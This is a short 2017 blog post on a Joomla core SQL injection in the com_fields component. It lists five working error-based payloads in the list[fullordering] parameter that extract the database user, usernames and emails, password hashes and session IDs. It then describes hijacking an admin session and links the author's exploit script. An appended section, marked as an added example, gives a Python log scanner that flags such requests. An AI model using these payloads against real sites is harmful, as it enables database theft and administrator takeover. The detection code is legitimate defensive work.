Joomla core SQL injection vulnerability

The injection statements are as follows:

payload1 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)'

payload2 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)'

payload3 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)'

payload4 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)'

payload5 = '/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select session_id from %23__session where username in (select username from %23__users))),1)'

 

Then visit the admin backend and change it with Firebug; remember to add the username as well.

 

The exploit script I wrote this afternoon:

https://github.com/222222amor/exp_notes/blob/master/joomla_core_sqli.py
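
For defenders: every payload above puts a function call or subquery into `list[fullordering]` on `option=com_fields`, so requests of this kind stand out in web server logs. The following is an added example, not part of the original post or of the linked script; it assumes combined-format access logs and that a legitimate ordering value is a column name with an optional direction, and the names `suspicious_ordering` and `scan` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate ordering value is "column" or "column direction".
SAFE_ORDERING = re.compile(r"^[A-Za-z0-9_.]+(?: (?:asc|desc))?$", re.IGNORECASE)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_ordering(url):
    """Return the list[fullordering] value if it is not a plain ordering, else None."""
    # parse_qsl percent-decodes keys and values, so list%5Bfullordering%5D is caught too.
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    params = {key.lower(): value for key, value in pairs}
    if params.get("option", "").lower() != "com_fields":
        return None
    value = params.get("list[fullordering]", "").strip()
    if not value or SAFE_ORDERING.match(value):
        return None
    return value


def scan(log_lines):
    """Return (client_ip, offending_value) for each flagged log line."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        value = suspicious_ordering(match.group(1))
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/May/2017:10:01:02 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.title%20ASC HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/May/2017:10:01:05 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(1,concat(1,user()),1) HTTP/1.1" 500 912',
    '198.51.100.7 - - [22/May/2017:10:01:09 +0800] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8841',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} suspicious list[fullordering]: {value!r}")
```

The same allowlist pattern can be applied as a request filter in front of the site until the Joomla installation is updated.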

 

posted @ 2017-05-22 11:14  轻落语